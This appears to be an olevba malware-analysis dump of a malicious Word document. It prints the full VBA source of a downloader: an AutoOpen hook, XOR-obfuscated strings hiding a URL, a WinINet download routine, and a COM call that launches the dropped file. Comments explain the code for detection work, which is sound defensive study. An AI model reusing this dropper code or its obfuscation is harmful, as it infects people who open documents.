dynamoo

Malicious Word macro

Mar 24th, 2015
  1. olevba 0.25 - http://decalage.info/python/oletools
  2. Flags Filename
  3. ----------- -----------------------------------------------------------------
  4. OLE:MASIHB- s22c-6~1.doc
  5.  
  6. (Flags: OpX=OpenXML, XML=Word2003XML, M=Macros, A=Auto-executable, S=Suspicious keywords, I=IOCs, H=Hex strings, B=Base64 strings, D=Dridex strings, ?=Unknown)
  7.  
  8. ===============================================================================
  9. FILE: s22c-6~1.doc
  10. Type: OLE
  11. -------------------------------------------------------------------------------
  12. VBA MACRO ThisDocument.cls
  13. in file: s22c-6~1.doc - OLE stream: u'Macros/VBA/ThisDocument'
  14. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Sub autoopen()
' AutoOpen entry point: Word runs this as soon as the document is opened
' (olevba lists it under AutoExec). Its only job is to call HLOPHLOP32 in
' Module5, which holds the actual download-and-launch logic; keeping the
' entry stub this small is what makes the ThisDocument stream look harmless
' on a quick glance.
HLOPHLOP32
End Sub
  18. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  19. ANALYSIS:
  20. +----------+----------+---------------------------------------+
  21. | Type | Keyword | Description |
  22. +----------+----------+---------------------------------------+
  23. | AutoExec | AutoOpen | Runs when the Word document is opened |
  24. +----------+----------+---------------------------------------+
  25. -------------------------------------------------------------------------------
  26. VBA MACRO Module4.bas
  27. in file: s22c-6~1.doc - OLE stream: u'Macros/VBA/Module4'
  28. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  29. (empty macro)
  30. -------------------------------------------------------------------------------
  31. VBA MACRO Module11.bas
  32. in file: s22c-6~1.doc - OLE stream: u'Macros/VBA/Module11'
  33. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  34. (empty macro)
  35. -------------------------------------------------------------------------------
  36. VBA MACRO Module1.bas
  37. in file: s22c-6~1.doc - OLE stream: u'Macros/VBA/Module1'
  38. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  39. ' (File name: AddNewSheet.bas)
  40. ' Author: SENOO, Ken
  41. ' LICENSE: CC0
  42. ' (Last update: 2015-03-10T18:38+09:00)
  43.  
Sub AddNewSheet(sheet_name)
' Excel helper: replaces any worksheet called sheet_name with a fresh one.
' Worksheets/Sheets/ActiveSheet are Excel objects, not Word ones, and no
' other module in this document references this procedure, so it reads as
' copied filler (the CC0 header above credits the original author) that
' gives the VBA project a benign-looking module. The author's comments were
' lost to mis-encoding ("????", probably Japanese given the +09:00 stamp)
' and are paraphrased in English below.

' Delete every sheet already carrying the requested name; DisplayAlerts is
' switched off only around the deletion so Excel does not prompt.
For Each ws In Worksheets
If ws.Name = sheet_name Then
Application.DisplayAlerts = False
ws.Delete
Application.DisplayAlerts = True
End If
Next ws

' Add a new sheet after the active one and give it the requested name.
Sheets.Add(After:=ActiveSheet).Name = sheet_name

End Sub
  59. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  60. ANALYSIS:
  61. No suspicious keyword or IOC found.
  62. -------------------------------------------------------------------------------
  63. VBA MACRO UFO.frm
  64. in file: s22c-6~1.doc - OLE stream: u'Macros/VBA/UFO'
  65. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  66. (empty macro)
  67. -------------------------------------------------------------------------------
  68. VBA MACRO Class1.cls
  69. in file: s22c-6~1.doc - OLE stream: u'Macros/VBA/Class1'
  70. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  71. (empty macro)
  72. -------------------------------------------------------------------------------
  73. VBA MACRO Module3.bas
  74. in file: s22c-6~1.doc - OLE stream: u'Macros/VBA/Module3'
  75. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  76. Option Explicit
  77.  
  78.  
' Parameters for the WinINet download in API22222 below. The names are
' obfuscated; the meaning of each is recovered from the argument position it
' is passed in (see the Alias declarations in Module6).
Private Const API333333 = 8162 ' receive-buffer size in bytes, also the lNumBytesToRead passed to InternetReadFile
Private Const API33333 As String = "API33333" ' User-Agent handed to InternetOpenA (a usable network signature)
Private Const API3333 = 1 ' dwAccessType for InternetOpenA (1 = INTERNET_OPEN_TYPE_DIRECT)
Private Const API333 = &H4000000 ' dwFlags for InternetOpenUrlA; &H4000000 matches INTERNET_FLAG_NO_CACHE_WRITE - confirm
' Downloads sURL with WinINet and writes the response to sFileName.
' Returns True when the accumulated body has non-zero length, False when the
' session or the URL could not be opened. The obfuscated callees resolve
' through Module6's Alias clauses: API22222222 = InternetOpenA,
' API222222 = InternetOpenUrlA, API2222222 = InternetReadFile,
' API222222222 = InternetCloseHandle.
' olevba's Hex/Base64 Strings hits on this module are most likely the long
' alphanumeric identifiers themselves; no encoded payload is embedded here.
Public Function API22222(ByVal sURL As String, ByVal sFileName As String) As Boolean
' Handles are pointer-sized on 64-bit Office.
#If VBA7 And Win64 Then
Dim API2222 As LongPtr, API3333333 As LongPtr
#Else
Dim API2222 As Long, API3333333 As Long
#End If
Dim API2 As Long ' bytes returned by each InternetReadFile call
' API222: fixed-length receive buffer of API333333 (8162) characters;
' API33333333: the accumulated response body.
Dim API222 As String * API333333, API33333333 As String
Dim API22 As Integer, dData As Double ' file number; length of what was received
' InternetOpenA(agent "API33333", access type 1, no proxy, no bypass list, flags 0).
API2222 = API22222222(API33333, API3333, vbNullString, vbNullString, 0)
If API2222 = 0 Then
' Session failed: the result keeps its default value, False.
Exit Function
End If
' InternetOpenUrlA(session, sURL, no extra headers, 0, flags &H4000000, no context).
API3333333 = API222222(API2222, sURL, vbNullString, 0, API333, 0)
If API3333333 = 0 Then
dData = 0
Else
' The first read copies the entire fixed-length buffer instead of the API2
' bytes actually read, unlike the loop below which trims with Mid(). So the
' output always starts with a full 8162-character block (padding included
' when the first chunk is short), and dData can never be 0 on this branch:
' a True result only proves the URL opened, not that a real body arrived.
API2222222 API3333333, API222, API333333, API2
API33333333 = API222
Do While API2 <> 0
API2222222 API3333333, API222, API333333, API2
API33333333 = API33333333 + Mid(API222, 1, API2)
Loop
' Write the whole body as a single binary record, then close the file.
dData = Len(API33333333): API22 = FreeFile
Open sFileName For Binary Access Write Lock Write As #API22
Put #API22, , API33333333: Close #API22
End If
' Close the URL handle, then the session handle. Module6 declares the hInet
' parameter ByRef, so these calls receive the address of the variable rather
' than the handle value; the close is probably ineffective - TODO confirm.
API222222222 API3333333
API222222222 API2222
API33333333 = ""
' Non-zero length counts as success.
If dData Then
API22222 = True
End If
End Function
  117. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  118. ANALYSIS:
  119. +------------+----------------+-----------------------------------------+
  120. | Type | Keyword | Description |
  121. +------------+----------------+-----------------------------------------+
  122. | Suspicious | Open | May open a file |
  123. | Suspicious | Write | May write to a file (if combined with |
  124. | | | Open) |
  125. | Suspicious | Put | May write to a file (if combined with |
  126. | | | Open) |
  127. | Suspicious | Binary | May read or write a binary file (if |
  128. | | | combined with Open) |
  129. | Suspicious | Hex Strings | Hex-encoded strings were detected, may |
  130. | | | be used to obfuscate strings (option |
  131. | | | --decode to see all) |
  132. | Suspicious | Base64 Strings | Base64-encoded strings were detected, |
  133. | | | may be used to obfuscate strings |
  134. | | | (option --decode to see all) |
  135. +------------+----------------+-----------------------------------------+
  136. -------------------------------------------------------------------------------
  137. VBA MACRO Module2.bas
  138. in file: s22c-6~1.doc - OLE stream: u'Macros/VBA/Module2'
  139. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  140. (empty macro)
  141. -------------------------------------------------------------------------------
  142. VBA MACRO Module5.bas
  143. in file: s22c-6~1.doc - OLE stream: u'Macros/VBA/Module5'
  144. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
' Obfuscated string table for HLOPHLOP32. X1111 is the XOR key; the other
' four are hex ciphertexts that STOP7777777777(X1111, <const>) in Module6
' turns back into text at run time. By how each decoded value is used in
' HLOPHLOP32:
'   X11111    - ProgID for the first CreateObject; the methods then called
'               on it (GetSpecialFolder, FileExists, DeleteFile) are those
'               of Scripting.FileSystemObject
'   X1111111  - file name appended to the special-folder path (drop location)
'   X111111   - URL passed to API22222 as sURL: the primary IOC to extract,
'               best recovered with `olevba --decode` or a short script that
'               re-implements the XOR loop rather than by hand
'   X11111111 - ProgID for the second CreateObject, whose Open method is
'               called on the dropped file (a manual decode suggests
'               Shell.Application - confirm)
Private Const X11111111 = "1E25282121630C3D3D21242E5246242223"
Private Const X1111111 = "111D0C0120243E2E7F637863011C283528"
Private Const X111111 = "2539393D77626229222A223F575B2863292862273E622F242363284B57"
Private Const X11111 = "1E2E3F243D3924232A630B245F571E343E392820022F27282E39"
Private Const X1111 = "MMMMMMMMMMMMM32"
  150.  
  151.  
  152.  
  153.  
  154.  
  155.  
Sub HLOPHLOP32()
' Payload routine, called from ThisDocument.autoopen. Every string it needs
' is decoded on the fly by STOP7777777777 (Module6) from the hex constants at
' the top of this module, using the key X1111. Flow: build a path inside a
' special folder, delete any file already there, fetch a URL into it with
' API22222 (Module3), then invoke a second COM object's Open method on it.
' Much of the body is filler: the counted loops can never reach their End /
' Exit conditions in a meaningful way, and the line continuations only split
' keywords across lines. Module5 has no Option Explicit, so X1, SSSS and
' SASASA are implicitly declared Variants.
' Observable side effects for detection: winword.exe loading wininet.dll,
' a new file written under the chosen special folder, and a child process
' spawned from Word via the COM object's Open call.
'* NAPIDPAOJMXNH55
' Filler loop: exits on the first iteration because 3 <> 14.
Dim T111111111111111 _
As Long
For T111111111111111 = _
3 To 10
If Not T111111111111111 = 14 _
Then Exit For
Next T111111111111111
' First COM object from decoded X11111 (FileSystemObject-style methods are
' used on it below).
Dim X111
Set X111 = CreateObject _
(STOP7777777777 _
(X1111, X11111))
Dim X11
' Special-folder selector; for FileSystemObject.GetSpecialFolder, 2 is the
' TemporaryFolder - confirm by decoding X11111.
Const X11ID = 2
' Filler loop: a single pass with the counter at 0, so End never runs.
Dim T11111111111111 As Integer
For T11111111111111 = 0 To 0
If T11111111111111 = 5 Then End
Next T11111111111111
Set X11 = X111.GetSpecialFolder _
(X11ID)
' Filler loop, same shape as above.
Dim T1111111111111 As Integer
For T1111111111111 = 0 To 0
If T1111111111111 = 5 Then End
Next T1111111111111
' X1 = <special folder> & decoded X1111111: the drop path. The folder object
' is concatenated directly, which presumably relies on its default property.
X1 = X11 & STOP7777777777 _
(X1111, X1111111)
' Filler loop.
Dim T111111111111 As Integer
For T111111111111 = 0 To 0
If T111111111111 = 5 Then End
Next T111111111111
' Re-creates the same object as above; X111 was still valid, so this is
' redundant.
Set X111 = CreateObject _
(STOP7777777777 _
(X1111, X11111))
' Filler loop.
Dim T11111111111 As Integer
For T11111111111 = 0 To 0
If T11111111111 = 5 Then End
Next T11111111111
' Remove an earlier copy so the download can overwrite it.
If X111.FileExists _
(X1) Then
X111. _
DeleteFile X1
End If
' Download: decoded X111111 is the URL, X1 the destination. The Boolean
' result is discarded (empty If), so the Open call below happens regardless
' of whether anything was written.
If API22222(STOP7777777777 _
(X1111, X111111), X1) Then
End If
' No-op: SSSS is never assigned anything.
Set SSSS = Nothing
' Dead check: the branch body is empty.
If X111. _
FileExists _
(X1) Then
End If
' Second COM object from decoded X11111111; calling its Open method on the
' dropped path is the step that launches the downloaded file.
Set SASASA = CreateObject _
(STOP7777777777 _
(X1111, X11111111))
SASASA.Open X1
End Sub
  212.  
  213.  
  214.  
  215.  
  216.  
  217.  
  218. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  219. ANALYSIS:
  220. +------------+--------------+-----------------------------------------+
  221. | Type | Keyword | Description |
  222. +------------+--------------+-----------------------------------------+
  223. | Suspicious | CreateObject | May create an OLE object |
  224. | Suspicious | Open | May open a file |
  225. | Suspicious | Hex Strings | Hex-encoded strings were detected, may |
  226. | | | be used to obfuscate strings (option |
  227. | | | --decode to see all) |
  228. +------------+--------------+-----------------------------------------+
  229. -------------------------------------------------------------------------------
  230. VBA MACRO Module6.bas
  231. in file: s22c-6~1.doc - OLE stream: u'Macros/VBA/Module6'
  232. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  233. Option Explicit
  234.  
' WinINet imports under obfuscated names; the Alias clause carries the real
' export, so the DLL and function names are still visible to static tools
' (olevba's IOC hit on wininet.dll comes from here). All four are called
' from API22222 in Module3. The #If branch uses LongPtr handles for 64-bit
' Office (VBA7 And Win64); the #Else branch uses 32-bit Longs.
'   API222222222 -> InternetCloseHandle (hInet is declared ByRef, so callers
'                   hand over the address of the handle variable instead of
'                   the handle value; the close is probably ineffective and
'                   the handles leak - TODO confirm)
'   API22222222  -> InternetOpenA (agent, access type, proxy, bypass, flags)
'   API2222222   -> InternetReadFile (handle, buffer, bytes to read, ByRef bytes read)
'   API222222    -> InternetOpenUrlA (session, URL, headers, header length, flags, context)
#If VBA7 And Win64 Then
Public Declare PtrSafe Function API222222222 Lib "wininet.dll" Alias "InternetCloseHandle" (ByRef hInet As LongPtr) As Long
Public Declare PtrSafe Function API22222222 Lib "wininet.dll" Alias "InternetOpenA" (ByVal sAgent As String, ByVal lAccessType As Long, ByVal sProxyName As String, ByVal sProxyBypass As String, ByVal lFlags As Long) As LongPtr
Public Declare PtrSafe Function API2222222 Lib "wininet.dll" Alias "InternetReadFile" (ByVal API3333333 As LongPtr, ByVal API222 As String, ByVal lNumBytesToRead As Long, lNumberOfBytesRead As Long) As Integer
Public Declare PtrSafe Function API222222 Lib "wininet.dll" Alias "InternetOpenUrlA" (ByVal hInternetSession As LongPtr, ByVal lpszUrl As String, ByVal lpszHeaders As String, ByVal dwHeadersLength As Long, ByVal dwFlags As Long, ByVal dwContext As Long) As LongPtr
#Else
Public Declare Function API222222222 Lib "wininet.dll" Alias "InternetCloseHandle" (ByRef hInet As Long) As Long
Public Declare Function API22222222 Lib "wininet.dll" Alias "InternetOpenA" (ByVal sAgent As String, ByVal lAccessType As Long, ByVal sProxyName As String, ByVal sProxyBypass As String, ByVal lFlags As Long) As Long
Public Declare Function API2222222 Lib "wininet.dll" Alias "InternetReadFile" (ByVal API3333333 As Long, ByVal API222 As String, ByVal lNumBytesToRead As Long, lNumberOfBytesRead As Long) As Integer
Public Declare Function API222222 Lib "wininet.dll" Alias "InternetOpenUrlA" (ByVal hInternetSession As Long, ByVal lpszUrl As String, ByVal lpszHeaders As String, ByVal dwHeadersLength As Long, ByVal dwFlags As Long, ByVal dwContext As Long) As Long
#End If
  246.  
  247.  
' XOR decoder for the hex string table in Module5 (the reason olevba flags
' Chr and Xor in this module).
'   STOP777777777 - key string (X1111 in Module5)
'   STOP77777777  - ciphertext as a hex string, two characters per byte
' Returns the plaintext. Byte i (1-based) is XORed with the key character at
' position (i Mod Len(key)) + 1, i.e. the key is consumed from its second
' character and wraps around to the first. Re-implementing this loop in a
' few lines of any scripting language recovers every constant; the two
' accumulator names differ only by letter O versus digit 0 (see the Dims).
Public Function STOP7777777777(STOP777777777 As String, STOP77777777 As String) As String
Dim asasas1 As Long ' byte index into the ciphertext
Dim asasas1O As String ' output accumulator (letter O); starts as ""
Dim asasas10 As Integer ' current ciphertext byte (digit 0)
Dim asasas101 As Integer ' current key byte
' Len(...)/2 is a floating-point division that VBA rounds when it is used
' as the Long loop bound; all the constants in Module5 have even length.
For asasas1 = 1 To (Len(STOP77777777) / 2)
asasas10 = Val("&H" & (Mid$(STOP77777777, (2 * asasas1) - 1, 2)))
asasas101 = Asc(Mid$(STOP777777777, ((asasas1 Mod Len(STOP777777777)) + 1), 1))
asasas1O = asasas1O + Chr(asasas10 Xor asasas101)
Next asasas1
STOP7777777777 = asasas1O
End Function
  260. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  261. ANALYSIS:
  262. +------------+----------------+-----------------------------------------+
  263. | Type | Keyword | Description |
  264. +------------+----------------+-----------------------------------------+
  265. | Suspicious | Lib | May run code from a DLL |
  266. | Suspicious | Chr | May attempt to obfuscate specific |
  267. | | | strings |
  268. | Suspicious | Xor | May attempt to obfuscate specific |
  269. | | | strings |
  270. | Suspicious | Hex Strings | Hex-encoded strings were detected, may |
  271. | | | be used to obfuscate strings (option |
  272. | | | --decode to see all) |
  273. | Suspicious | Base64 Strings | Base64-encoded strings were detected, |
  274. | | | may be used to obfuscate strings |
  275. | | | (option --decode to see all) |
  276. | IOC | wininet.dll | Executable file name |
  277. +------------+----------------+-----------------------------------------+